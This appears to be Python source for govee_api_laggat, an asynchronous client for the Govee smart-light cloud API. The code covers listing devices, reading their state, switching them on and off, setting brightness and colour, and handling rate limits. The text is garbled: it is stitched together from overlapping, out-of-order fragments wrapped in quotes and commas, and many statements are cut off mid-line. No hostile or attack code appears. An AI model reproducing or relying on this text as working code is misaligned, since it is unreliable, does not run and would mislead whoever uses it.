devices elif", "= await self._learning_storage._read_cached() changed = False # init Dict and entry for device", "\"g\": green, \"b\": blue} result, err = await self._control(device, command, command_color) if not", "not possible: {err}\") return result, err async def get_states(self) -> List[GoveeDevice]: \"\"\"Request states", "await response.text() delay = int((time.time() - start) * 1000) if response.status == 200:", "\"\"\"Set the online state and fire an event on change.\"\"\" if self._online !=", "err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].brightness", "get_devices(self) -> Tuple[List[GoveeDevice], str]: \"\"\"Get and cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices = {} err", "where each value may be in range 0-255 \"\"\" success = False err", "val: bool): \"\"\" Set global behavour when device is offline. None: default, use", "client.\"\"\" async def __aenter__(self): \"\"\"Async context manager enter.\"\"\" self._session = aiohttp.ClientSession() return self", "on a device, return success and error message.\"\"\" return await self._turn(device, \"on\") async", "{device_str} is locked for {seconds_locked} seconds. 
Command waiting: {cmd}\") await asyncio.sleep(seconds_locked) json =", "err = f\"Device {device.device} is not controllable\" _LOGGER.debug(f\"control {device_str} not possible: {err}\") elif", "response.status == 200: timestamp = self._utcnow() json_obj = await response.json() prop_online = False", "int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit total: {self._limit}, remaining:", "def __init__( self, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Init with", "\"\"\"Get and cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices = {} err = None async with", "utcSeconds - self._utcnow() if seconds_lock < 0: seconds_lock = 0 return seconds_lock async", "async with self._api_get(url=_API_DEVICES_STATE, params=params) as response: if response.status == 200: timestamp = self._utcnow()", "remaining calls that trigger rate limiting.\"\"\" if val > self._limit: raise GoveeError( f\"Rate", "property '{prop}'\") if not prop_online: if self.config_offline_is_off is not None: # global option", "state from hisory for n seconds after controlling the device DELAY_GET_FOLLOWING_SET_SECONDS = 2", "err = await self._control(device, command, command_color) if not err: success = self._is_success_result_message(result) if", "= prop_online result.power_state = prop_power_state result.brightness = prop_brightness result.color = prop_color result.color_temp =", "device {device_str}, {device}\" else: if color_temp < 2000 or color_temp > 9000: err", "None err = None if not device: err = f\"Invalid device {device_str}, {device}\"", "online state and fire an event on change.\"\"\" if self._online != online: self._online", "): device.learned_get_brightness_max = ( 100 # assumption, as we didn't get anything higher", "learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION) 
self._online = True # assume we are online", "self._learning_storage = GoveeAbstractLearningStorage() @classmethod async def create( cls, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage]", "command_color) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source", "invalid value {color_temp}, allowed range 2000-9000\" else: command = \"colorTem\" result, err =", "about state change self.events.online(self._online) if not online: # show all devices as offline", "device.before_set_brightness_turn_on: await self.turn_on(device) # api doesn't work if we don't sleep await asyncio.sleep(1)", "= self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color = color", "rate limit will be reset.\"\"\" return self._limit_reset - self._utcnow() @property def rate_limit_on(self): \"\"\"Remaining", "success, err async def set_color( self, device: Union[str, GoveeDevice], color: Tuple[int, int, int]", "GoveeError( f\"Rate limiter threshold {val} must be below {self._limit}\" ) if val <", "value {color}, red must be within 0 .. 254\" ) elif green <", "not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\"", "each value may be in range 0-255 \"\"\" success = False err =", "be within 0 .. 254\" elif blue < 0 or blue > 255:", ") -> Tuple[bool, str]: \"\"\"Set color (r, g, b) where each value may", "and error message.\"\"\" return await self._turn(device, \"on\") async def turn_off(self, device: Union[str, GoveeDevice])", "make per minute. 
_RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" # The number of requests remaining in", "in learning_infos: learning_info = learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on =", "raise GoveeError( f\"Rate limiter threshold {val} must be below {self._limit}\" ) if val", "GoveeDevice], brightness: int ) -> Tuple[bool, str]: \"\"\"Set brightness to 0-254.\"\"\" success =", "result = await response.text() delay = int((time.time() - start) * 1000) if response.status", "self._get_device(device) if not device: err = f\"Invalid device {device_str}, {device}\" else: command =", "Union[str, GoveeDevice] ) -> Tuple[GoveeDevice, str]: \"\"\"Get state for one specific device.\"\"\" device_str,", "dataclasses import dataclass from datetime import datetime from events import Events from typing", "{\"device\": device.device, \"model\": device.model} async with self._api_get(url=_API_DEVICES_STATE, params=params) as response: if response.status ==", "prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\" in prop: prop_color_temp = prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state", "and device_str in self._devices: device = self._devices[device_str] else: raise GoveeDeviceNotFound(device_str) return device_str, device", "def _control( self, device: Union[str, GoveeDevice], command: str, params: Any ) -> Tuple[Any,", "number of requests you're permitted to make per minute. 
_RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" #", "_RATELIMIT_TOTAL in response.headers and _RATELIMIT_REMAINING in response.headers and _RATELIMIT_RESET in response.headers ): try:", "success, err def _get_lock_seconds(self, utcSeconds: int) -> int: \"\"\"Get seconds to wait.\"\"\" seconds_lock", "@property def rate_limit_reset_seconds(self): \"\"\"Seconds until the rate limit will be reset.\"\"\" return self._limit_reset", "g, b) values\" else: red = color[0] green = color[1] blue = color[2]", "use config_offline_is_off from learning, or False by default. False: an offline device doesn't", "\"\"\"Control led strips and bulbs.\"\"\" device_str, device = self._get_device(device) cmd = {\"name\": command,", "_LOGGER.warning( f\"Rate limit exceeded, check if other devices also utilize the govee API\"", "color=(0, 0, 0), color_temp=0, timestamp=timestamp, source=\"history\", error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off", "cache last get_devices result self._devices = devices return self.devices, err def _get_device(self, device:", "controllable: bool retrievable: bool support_cmds: List[str] support_turn: bool support_brightness: bool support_color: bool support_color_tem:", "be within 0 .. 
254\" else: command = \"color\" command_color = {\"r\": red,", "state, err = await self._get_device_state(device_str) if err: _LOGGER.warning(\"error getting state for device %s:", "= Govee(api_key, learning_storage=learning_storage) await self.__aenter__() return self async def close(self): \"\"\"Use close when", "error_response: def __init__(self, err_msg): self._err_msg = err_msg status = -1 async def text(self):", "device {device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") return result, err async def get_states(self)", "( GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER = logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\" _API_PING = _API_BASE_URL", "changed = True if ( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ): _LOGGER.debug( \"learned device %s", "@property def rate_limit_on(self): \"\"\"Remaining calls that trigger rate limiting. Defaults to 5, which", "ex: # we are offline self._set_online(False) err = \"error from aiohttp: %s\" %", "the device DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass class GoveeDevice(object): \"\"\" Govee Device DTO \"\"\"", "%s: %s\", device_str, err, ) self._devices[device_str].error = err else: self._devices[device_str] = state self._devices[device_str].error", "async def turn_on(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn on a device,", "will be reset.\"\"\" return self._limit_reset @property def rate_limit_reset_seconds(self): \"\"\"Seconds until the rate limit", "f\"API-Error {response.status}: {result}\" return ping_ok_delay, err async def get_devices(self) -> Tuple[List[GoveeDevice], str]: \"\"\"Get", "prop_power_state result.brightness = prop_brightness result.color = prop_color result.color_temp = prop_color_temp result.timestamp = timestamp", "the remaining calls that trigger rate limiting.\"\"\" if val > self._limit: raise GoveeError(", "blue} result, err = await self._control(device, 
command, command_color) if not err: success =", "self._api_put( url=_API_DEVICES_CONTROL, json=json ) as response: if response.status == 200: device.lock_set_until = (", "response.status == 200: device.lock_set_until = ( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until = (", "support_color_tem: bool online: bool power_state: bool brightness: int color: Tuple[int, int, int] color_temp:", "0..100 as 0..254 didn't work brightness_set = brightness_set_100 brightness_result = brightness_result_100 result, err", "elif \"colorTemInKelvin\" in prop: prop_color_temp = prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state property '{prop}'\") if", "on command {cmd}: {text} for device {device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") return", "# somehow these are all dicts with one element if \"online\" in prop:", "result = await response.json() else: text = await response.text() err = f\"API-Error {response.status}", "range for %s is assumed. If the brightness slider doesn't match the actual", "other clients. 
\"\"\" return self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self, val): \"\"\"Set the remaining calls", "devices from API.\"\"\" _LOGGER.debug(\"get_states\") for device_str in self._devices: state, err = await self._get_device_state(device_str)", "= 100 self._limit_remaining = 100 self._limit_reset = 0 self._config_offline_is_off = None self._learning_storage =", "Tuple[GoveeDevice, str]: \"\"\"Get state for one specific device.\"\"\" device_str, device = self._get_device(device) result", "= None err = None seconds_locked = self._get_lock_seconds(device.lock_get_until) if not device: err =", "self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color_temp = color_temp return success, err async def set_color(", "device.retrievable: # device {device_str} isn't able to return state, return 'history' state self._devices[device_str].source", "setting brightness.\", device.device, device.learned_set_brightness_max, ) learning_infos[ device.device ].set_brightness_max = device.learned_set_brightness_max changed = True", "def rate_limit_reset_seconds(self): \"\"\"Seconds until the rate limit will be reset.\"\"\" return self._limit_reset -", "def __aenter__(self): \"\"\"Async context manager enter.\"\"\" self._session = aiohttp.ClientSession() return self async def", "await self.rate_limit_delay() try: async with request_lambda() as response: self._set_online(True) # we got something,", "didn't get anything higher ) if prop_brightness > 100: device.learned_get_brightness_max = 254 await", "\"\"\"Remaining Rate limit.\"\"\" return self._limit_remaining @property def rate_limit_reset(self): \"\"\"UTC time in seconds when", "without using an async context manager.\"\"\" await self.__aexit__() def _getHeaders(self, auth: bool): \"\"\"Return", "this value.\"\"\" return self._limit @property def rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\" return self._limit_remaining @property", "result = self._devices[device_str] 
elif seconds_locked: # we just changed something, return state from", "VERSION from govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER = logging.getLogger(__name__) _API_BASE_URL =", "turn_off(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn off a device, return success", "brightness > 0 and device.before_set_brightness_turn_on: await self.turn_on(device) # api doesn't work if we", "# set brightness as 0..100 as 0..254 didn't work brightness_set = brightness_set_100 brightness_result", "device_str, device = self._get_device(device) if not device: err = f\"Invalid device {device_str}, {device}\"", "bool support_color: bool support_color_tem: bool online: bool power_state: bool brightness: int color: Tuple[int,", "-> Tuple[str, GoveeDevice]: \"\"\"Get a device by address or GoveeDevice DTO. returns: device_address,", "int((time.time() - start) * 1000) if response.status == 200: if \"Pong\" == result:", "and prop_brightness > 100 ): device.learned_get_brightness_max = ( 100 # assumption, as we", "a success result.\"\"\" return \"message\" in result and result[\"message\"] == \"Success\" async def", "is not controllable\" _LOGGER.debug(f\"control {device_str} not possible: {err}\") elif not command in device.support_cmds:", "self._devices[device_str].color_temp = color_temp return success, err async def set_color( self, device: Union[str, GoveeDevice],", "brightness.\", device.device, device.learned_set_brightness_max, ) learning_infos[ device.device ].set_brightness_max = device.learned_set_brightness_max changed = True if", "self._learning_storage._read_cached() changed = False # init Dict and entry for device if learning_infos", "return 'history' state self._devices[device_str].source = \"history\" result = self._devices[device_str] elif seconds_locked: # we", "self._learning_storage = learning_storage if not self._learning_storage: # use an internal learning storage as", "'{prop}'\") if not 
prop_online: if self.config_offline_is_off is not None: # global option if", "from typing import Any, List, Optional, Tuple, Union import aiohttp from govee_api_laggat.__version__ import", "*, auth=True, url: str, json): \"\"\"API HTTP Put call.\"\"\" async with self._api_request_internal( lambda:", "\"\"\"UTC time in seconds when the rate limit will be reset.\"\"\" return self._limit_reset", "result, err = await self._control( device, command, brightness_set ) if not err: device.learned_set_brightness_max", "\"value\": params} _LOGGER.debug(f\"control {device_str}: {cmd}\") result = None err = None if not", "UTC epoch seconds. # return state from hisory for n seconds after controlling", "List[str] support_turn: bool support_brightness: bool support_color: bool support_color_tem: bool online: bool power_state: bool", "by some conditions if not is_retrievable: learned_get_brightness_max = -1 if model_str == \"H6104\":", "= \"history\" self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state = brightness_result > 0 return success, err", "= max(1, delay) else: err = f\"API-Result wrong: {result}\" else: result = await", "else: if len(color) != 3: err = f\"set_color: invalid value {color}, must be", "result.color = prop_color result.color_temp = prop_color_temp result.timestamp = timestamp result.source = \"api\" result.error", "possible: {err}\") return result, err async def get_states(self) -> List[GoveeDevice]: \"\"\"Request states for", "return device @property def online(self): \"\"\"Last request was able to connect to the", "contextlib import asynccontextmanager from dataclasses import dataclass from datetime import datetime from events", "str]: \"\"\"Turn command called by turn_on and turn_off.\"\"\" success = False err =", "return seconds_lock async def _control( self, device: Union[str, GoveeDevice], command: str, params: Any", "return success and error message.\"\"\" return await self._turn(device, \"on\") async def 
turn_off(self, device:", "do we need to sleep? sleep_sec = self.rate_limit_reset_seconds if sleep_sec > 0: _LOGGER.warning(", "( device.learned_get_brightness_max == 100 and prop_brightness > 100 ): device.learned_get_brightness_max = ( 100", "device {device_str}, {device}\" else: if not device.controllable: err = f\"Device {device.device} is not", "not in learning_infos: learning_infos[device.device] = GoveeLearnedInfo() # output what was lerned, and learn", "GoveeDevice], onOff: str ) -> Tuple[bool, str]: \"\"\"Turn command called by turn_on and", "{device_str}, {device}\" else: if not device.controllable: err = f\"Device {device.device} is not controllable\"", "@asynccontextmanager async def _api_request_internal(self, request_lambda): \"\"\"API Methond handling all HTTP calls. This also", "if not prop_online: if self.config_offline_is_off is not None: # global option if self.config_offline_is_off:", "not device.controllable: err = f\"Device {device.device} is not controllable\" _LOGGER.debug(f\"control {device_str} not possible:", "this is the learning config, possibly overridden by a global config class GoveeError(Exception):", "as 0..254 didn't work brightness_set = brightness_set_100 brightness_result = brightness_result_100 result, err =", "learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else: result = await response.text() err = f\"API-Error {response.status}:", "self.__aenter__() return self async def close(self): \"\"\"Use close when your are finished with", "= await self._control(device, command, params) success = False if not err: success =", "message.\"\"\" return await self._turn(device, \"on\") async def turn_off(self, device: Union[str, GoveeDevice]) -> Tuple[bool,", "err: # try again with 0-100 range if \"API-Error 400\" in err: #", "+ DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until = ( self._utcnow() + 
DELAY_GET_FOLLOWING_SET_SECONDS ) result = await", "seconds_lock < 0: seconds_lock = 0 return seconds_lock async def _control( self, device:", "if response.status == 200: if \"Pong\" == result: ping_ok_delay = max(1, delay) else:", "_set_online(self, online: bool): \"\"\"Set the online state and fire an event on change.\"\"\"", "None or ( device.learned_get_brightness_max == 100 and prop_brightness > 100 ): device.learned_get_brightness_max =", "Set global behavour when device is offline. None: default, use config_offline_is_off from learning,", "async def _control( self, device: Union[str, GoveeDevice], command: str, params: Any ) ->", "json = {\"device\": device.device, \"model\": device.model, \"cmd\": cmd} await self.rate_limit_delay() async with self._api_put(", "else: text = await response.text() err = f\"API-Error {response.status} on command {cmd}: {text}", "by address or GoveeDevice DTO. returns: device_address, device_dto \"\"\" device_str = device if", "when the rate limit will be reset.\"\"\" return self._limit_reset @property def rate_limit_reset_seconds(self): \"\"\"Seconds", "* 254 / 100 ) result = self._devices[device_str] result.online = prop_online result.power_state =", "err = f\"set_color_temp: invalid value {color_temp}, allowed range 2000-9000\" else: command = \"colorTem\"", "else: command = \"colorTem\" result, err = await self._control(device, command, color_temp) if not", "else: result = await response.text() err = f\"API-Error {response.status}: {result}\" # cache last", "command, color_temp) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow", "red, \"g\": green, \"b\": blue} result, err = await self._control(device, command, command_color) if", "command = \"brightness\" result, err = await self._control(device, command, brightness_set) if err: #", "device.learned_get_brightness_max == 100: _LOGGER.info( \"brightness range for %s is assumed. 
If the brightness", "None if not device: err = f\"Invalid device {device_str}, {device}\" else: if not", "5, which means there is some room for other clients. \"\"\" return self._rate_limit_on", "100: # scale range 0-100 up to 0-254 prop_brightness = math.floor( prop_brightness *", "connect to the API.\"\"\" return self._online def _set_online(self, online: bool): \"\"\"Set the online", "= self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color = color return success, err def _get_lock_seconds(self,", "prop_online result.power_state = prop_power_state result.brightness = prop_brightness result.color = prop_color result.color_temp = prop_color_temp", "an offline device is shown as off. \"\"\" self._config_offline_is_off = val @property def", "assuming defaults for learned/configured values learned_set_brightness_max = None learned_get_brightness_max = None before_set_brightness_turn_on =", "self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].power_state = onOff == \"on\" return success,", "400\" in err: # Unsupported Cmd Value # set brightness as 0..100 as", "= self._devices[device_str] _LOGGER.debug( f\"state object returned from cache: {result}, next state for {device.device}", "{device_str}, {device}\" else: command = \"turn\" params = onOff result, err = await", "await response.json() timestamp = self._utcnow() learning_infos = await self._learning_storage._read_cached() for item in result[\"data\"][\"devices\"]:", "defaults for state online=True, power_state=False, brightness=0, color=(0, 0, 0), color_temp=0, timestamp=timestamp, source=\"history\", error=None,", "= time.time() ping_ok_delay = None err = None async with self._api_get(url=_API_PING, auth=False) as", ") as response: yield response @asynccontextmanager async def _api_request_internal(self, request_lambda): \"\"\"API Methond handling", "await self._learn(device) else: if brightness_set > 100: 
device.learned_set_brightness_max = 254 await self._learn(device) if", "\"\"\"Base Exception thrown from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\" class Govee(object): \"\"\"Govee", ") ) as response: yield response @asynccontextmanager async def _api_get(self, *, auth=True, url:", "response yield response except aiohttp.ClientError as ex: # we are offline self._set_online(False) err", "{device_str} not possible: {err}\") elif not command in device.support_cmds: err = f\"Command {command}", "auth: bool): \"\"\"Return Request headers with/without authentication.\"\"\" if auth: return {\"Govee-API-Key\": self._api_key} return", "elif isinstance(device, str) and device_str in self._devices: device = self._devices[device_str] else: raise GoveeDeviceNotFound(device_str)", "self.rate_limit_on: # do we need to sleep? sleep_sec = self.rate_limit_reset_seconds if sleep_sec >", "color[0] green = color[1] blue = color[2] if red < 0 or red", "int, int] ) -> Tuple[bool, str]: \"\"\"Set color (r, g, b) where each", "== 429: _LOGGER.warning( f\"Rate limit exceeded, check if other devices also utilize the", "rate limiting.\"\"\" if response.status == 429: _LOGGER.warning( f\"Rate limit exceeded, check if other", "int color: Tuple[int, int, int] color_temp: int timestamp: int source: str error: str", "def devices(self) -> List[GoveeDevice]: \"\"\"Cached devices list.\"\"\" lst = [] for dev in", "the rate limit will be reset.\"\"\" return self._limit_reset @property def rate_limit_reset_seconds(self): \"\"\"Seconds until", "__init__(self, err_msg): self._err_msg = err_msg status = -1 async def text(self): return self._err_msg", "command, brightness_set ) if not err: device.learned_set_brightness_max = 100 await self._learn(device) else: if", "return self._limit_remaining @property def rate_limit_reset(self): \"\"\"UTC time in seconds when the rate limit", "True if ( _RATELIMIT_TOTAL in response.headers and _RATELIMIT_REMAINING in 
response.headers and _RATELIMIT_RESET in", "returned from API: {json_obj}, resulting state object: {result}\" ) else: errText = await", "learning_infos = await self._learning_storage._read_cached() for item in result[\"data\"][\"devices\"]: device_str = item[\"device\"] model_str =", "# defaults by some conditions if not is_retrievable: learned_get_brightness_max = -1 if model_str", "= color return success, err def _get_lock_seconds(self, utcSeconds: int) -> int: \"\"\"Get seconds", "option config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self, val: bool): \"\"\" Set global behavour", "_RATELIMIT_TOTAL = \"Rate-Limit-Total\" # The maximum number of requests you're permitted to make", "= \"error from aiohttp: %s\" % repr(ex) except Exception as ex: err =", "Tuple[float, str]: \"\"\"Ping the api endpoint. No API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\") start =", "= _API_BASE_URL + \"/v1/devices/state\" # API rate limit header keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\"", "else: err = f\"API-Result wrong: {result}\" else: result = await response.text() err =", "import dataclass from datetime import datetime from events import Events from typing import", "err = None await self.rate_limit_delay() try: async with request_lambda() as response: self._set_online(True) #", "import time import math from contextlib import asynccontextmanager from dataclasses import dataclass from", "import math from contextlib import asynccontextmanager from dataclasses import dataclass from datetime import", "Value # set brightness as 0..100 as 0..254 didn't work brightness_set = brightness_set_100", "\"\"\"Async context manager enter.\"\"\" self._session = aiohttp.ClientSession() return self async def __aexit__(self, *err):", "for all devices from API.\"\"\" _LOGGER.debug(\"get_states\") for device_str in self._devices: state, err =", "brightness_set = brightness_set_100 brightness_result = brightness_result_100 
result, err = await self._control( device, command,", "trying to get rate limits: {ex}\") if limit_unknown: self._limit_remaining -= 1 async def", "in response.headers and _RATELIMIT_RESET in response.headers ): try: self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining =", "_, device = self._get_device(device) return device @property def online(self): \"\"\"Last request was able", "error: %s\" % repr(ex) if err: class error_response: def __init__(self, err_msg): self._err_msg =", "device DTO devices[device_str] = GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in", "brightness_set ) if not err: device.learned_set_brightness_max = 100 await self._learn(device) else: if brightness_set", "manager.\"\"\" self = Govee(api_key, learning_storage=learning_storage) await self.__aenter__() return self async def close(self): \"\"\"Use", "= prop[\"powerState\"] == \"on\" elif \"brightness\" in prop: prop_brightness = prop[\"brightness\"] elif \"color\"", "or green > 255: err = f\"set_color: invalid value {color}, green must be", "actual brightness pull the brightness up to max once.\", device.device, ) changed =", "invalid value {color}, must be tuple with (r, g, b) values\" else: red", "isinstance(device, GoveeDevice): device_str = device.device if not device_str in self._devices: device = None", "the govee API\" ) limit_unknown = True if ( _RATELIMIT_TOTAL in response.headers and", "and storage for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online = True # assume", "not device: err = f\"Invalid device {device_str}, {device}\" else: command = \"turn\" params", "GoveeLearnedInfo() # output what was lerned, and learn if ( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max", "\"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL 
+ \"/v1/devices/state\" # API rate limit header keys _RATELIMIT_TOTAL", "= val @property def devices(self) -> List[GoveeDevice]: \"\"\"Cached devices list.\"\"\" lst = []", "response.text() err = f\"API-Error {response.status}: {result}\" # cache last get_devices result self._devices =", "f\"Invalid device {device_str}, {device}\" else: if brightness < 0 or brightness > 254:", "as response: yield response @asynccontextmanager async def _api_request_internal(self, request_lambda): \"\"\"API Methond handling all", "response.json() timestamp = self._utcnow() learning_infos = await self._learning_storage._read_cached() for item in result[\"data\"][\"devices\"]: device_str", "None, ): \"\"\"Use create method if you want to use this Client without", "# assume we are online self.events = Events() self._api_key = api_key self._devices =", "self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit total: {self._limit}, remaining: {self._limit_remaining}", "to 2000-9000.\"\"\" success = False err = None device_str, device = self._get_device(device) if", "return self._online def _set_online(self, online: bool): \"\"\"Set the online state and fire an", "API_KEY and storage for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online = True #", "{} @asynccontextmanager async def _api_put(self, *, auth=True, url: str, json): \"\"\"API HTTP Put", "brightness up to max once.\", device.device, ) changed = True learning_infos[ device.device ].get_brightness_max", "endpoint. No API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\") start = time.time() ping_ok_delay = None err", "err = f\"set_color: invalid value {color}, blue must be within 0 .. 
254\"", "for device_str in self._devices: state, err = await self._get_device_state(device_str) if err: _LOGGER.warning(\"error getting", "== 100 and prop_brightness > 100 ): device.learned_get_brightness_max = ( 100 # assumption,", "and cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices = {} err = None async with self._api_get(url=_API_DEVICES)", "didn't work brightness_set = brightness_set_100 brightness_result = brightness_result_100 result, err = await self._control(", "GoveeDevice(object): \"\"\" Govee Device DTO \"\"\" device: str model: str device_name: str controllable:", "= prop[\"brightness\"] elif \"color\" in prop: prop_color = ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], )", "\"history\" self._devices[device_str].color_temp = color_temp return success, err async def set_color( self, device: Union[str,", "time in seconds when the rate limit will be reset.\"\"\" return self._limit_reset @property", "254)) brightness_result_100 = math.ceil(brightness_set_100 * 254 / 100) if device.learned_set_brightness_max == 100: #", "{} if device.device not in learning_infos: learning_infos[device.device] = GoveeLearnedInfo() # output what was", "for {sleep_sec}s.\" ) await asyncio.sleep(sleep_sec) @property def rate_limit_total(self): \"\"\"Rate limit is counted down", "0 return seconds_lock async def _control( self, device: Union[str, GoveeDevice], command: str, params:", "{brightness}, allowed range 0 .. 
254\" else: if brightness > 0 and device.before_set_brightness_turn_on:", "in self._devices: device = self._devices[device_str] else: raise GoveeDeviceNotFound(device_str) return device_str, device def _is_success_result_message(self,", "Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Init with an API_KEY and storage for learned values.\"\"\"", "100: device.learned_set_brightness_max = 254 await self._learn(device) if not err: success = self._is_success_result_message(result) if", "_LOGGER.debug( \"learned device %s uses range 0-%s for setting brightness.\", device.device, device.learned_set_brightness_max, )", "color return success, err def _get_lock_seconds(self, utcSeconds: int) -> int: \"\"\"Get seconds to", "def _api_request_internal(self, request_lambda): \"\"\"API Methond handling all HTTP calls. This also handles: -", "offline for device in self.devices: device.online = False async def check_connection(self) -> bool:", "is the learning config, possibly overridden by a global config class GoveeError(Exception): \"\"\"Base", "from hisory for n seconds after controlling the device DELAY_GET_FOLLOWING_SET_SECONDS = 2 #", "may be in range 0-255 \"\"\" success = False err = None device_str,", "response.json() else: text = await response.text() err = f\"API-Error {response.status} on command {cmd}:", "{response.status}: {result}\" return ping_ok_delay, err async def get_devices(self) -> Tuple[List[GoveeDevice], str]: \"\"\"Get and", "text = await response.text() err = f\"API-Error {response.status} on command {cmd}: {text} for", "device = self._devices[device_str] else: raise GoveeDeviceNotFound(device_str) return device_str, device def _is_success_result_message(self, result) ->", "None before_set_brightness_turn_on = False config_offline_is_off = False # effenctive state # defaults by", "{device}\" else: if not device.controllable: err = f\"Device {device.device} is not controllable\" _LOGGER.debug(f\"control", "# API rate limit header keys 
_RATELIMIT_TOTAL = \"Rate-Limit-Total\" # The maximum number", "to 5, which means there is some room for other clients. \"\"\" return", "await self._turn(device, \"on\") async def turn_off(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn", "= await self._control(device, command, command_color) if not err: success = self._is_success_result_message(result) if success:", "brightness_result_100 = math.ceil(brightness_set_100 * 254 / 100) if device.learned_set_brightness_max == 100: # set", "return self async def __aexit__(self, *err): \"\"\"Async context manager exit.\"\"\" if self._session: await", "rate_limit_delay(self): \"\"\"Delay a call when rate limiting is active.\"\"\" # do we have", "= prop_color_temp result.timestamp = timestamp result.source = \"api\" result.error = None _LOGGER.debug( f\"state", "waiting: {cmd}\") await asyncio.sleep(seconds_locked) json = {\"device\": device.device, \"model\": device.model, \"cmd\": cmd} await", "int source: str error: str lock_set_until: int lock_get_until: int learned_set_brightness_max: int learned_get_brightness_max: int", "( _RATELIMIT_TOTAL in response.headers and _RATELIMIT_REMAINING in response.headers and _RATELIMIT_RESET in response.headers ):", "online=True, power_state=False, brightness=0, color=(0, 0, 0), color_temp=0, timestamp=timestamp, source=\"history\", error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max,", "err = f\"Invalid device {device_str}, {device}\" else: if brightness < 0 or brightness", "return success and error message.\"\"\" return await self._turn(device, \"off\") async def _turn( self,", "= err else: self._devices[device_str] = state self._devices[device_str].error = None return self.devices async def", "rate_limit_reset(self): \"\"\"UTC time in seconds when the rate limit will be reset.\"\"\" return", "the online state and fire an event on change.\"\"\" if self._online != online:", "(0, 0, 0) prop_color_temp = 0 for 
